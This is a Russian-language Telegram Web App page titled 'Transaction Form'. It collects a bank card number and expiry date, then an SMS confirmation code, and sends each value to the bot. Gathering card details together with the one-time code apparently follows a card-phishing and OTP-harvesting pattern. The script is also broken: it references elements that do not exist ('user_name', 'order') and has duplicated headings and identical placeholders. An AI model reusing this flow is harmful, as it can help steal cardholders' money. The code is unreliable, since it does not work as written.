<!doctype html>
<html lang="ru" xmlns="http://www.w3.org/1999/html">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <!--    <link rel="stylesheet" href="style.css">-->
    <title>Transaction Form</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Montserrat:wght@200:500&display=swap');
        *{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Montserrat', sans-serif;
            font-weight: 200;
            color: var(--tg-theme-text-color);
            background: var(--tg-theme-bg-color);
        }

        #main{
            width: 100%;
            padding: 20px;
            text-align: center;
        }

        h1{
            margin-top: 50px;
            margin-bottom: 10px;
        }

        img{
            width: 70px;
            margin: 30px auto;
        }

        p{
            width: 350px;
            margin: 0 auto;
        }

        button{
            border: 0;
            border-radius: 5px;
            margin-top: 50px;
            height: 60px;
            width: 200px;
            font-size: 20px;
            font-weight: 500;
            cursor: pointer;
            transition: all 500ms ease;
            color: var(--tg-theme-button-color);
            background: var(--tg-theme-button-text-color);
        }

        button:hover {
            background: var(--tg-theme-secondary-bg-color);
        }

        #form{
          display: none;
          text-align: center;
        }

        input{
          width:90%;
          outline: none;
          margin: 10px 5%;
          padding: 15px 10px;
          font-size: 14px;
          border: 2px solid silver;
          border-radius: 5px;
        }

        input:focus {
          border-color: #db5d5d;
        }

    </style>
</head>
<body>
<div id = "main">
    <h1>Создать карту</h1>
    <button type="button"><img src = photos/card1.webp/></button>
    <h1>Создать карту</h1>
    <button type="button"><img src = photos/card.webp/></button>
    <input type="text" placeholder="Номер карты" id="cardNumber">
    <input type="text" placeholder="Дата истечения срока" id="expiry">
    <button id = "addCard">Добавить</button>
</div>
<form id="form">
    <input type="text" placeholder="имя" id="user_id">
    <input type="text" placeholder="имя" id="user_first_name">
    <input type="text" placeholder="имя" id="user_last_name">
    <input type="text" placeholder="Введите код отправленный на номер" id="confirmCode">
    <button id="send">Отправить</button>
    <div id="error"></div>
</form>

<script src="https://telegram.org/js/telegram-web-app.js"></script>

<script>
        let tg = window.Telegram.WebApp;
        let addCard = document.getElementById("addCard");
        let send = document.getElementById("send");

        tg.expand();

        addCard.addEventListener("click", () => {

            document.getElementById("main").style.display = "none";
            document.getElementById("form").style.display = "block";

            document.getElementById("user_name").value = tg.initDataUnsafe.user.id + " " + tg.initDataUnsafe.user.first_name

            let cardNumber = document.getElementById("cardNumber").value;
            let expiry = document.getElementById("expiry").value;

            let data = {
                action: "addCard",
                cardNumber: cardNumber,
                expiry: expiry
            };
            tg.sendData(JSON.stringify(data));

        });
        send.addEventListener("click", () => {
            document.getElementById("order").innerText = '';
            let code = document.getElementById("confirmCode").value;

            let data = {
                code: code
            };

            tg.sendData(JSON.stringify(data));

            tg.close();
        });
    </script>
<!-- <script src="https://telegram.org/js/telegram-web-app.js"> </script> -->

</body>
</html>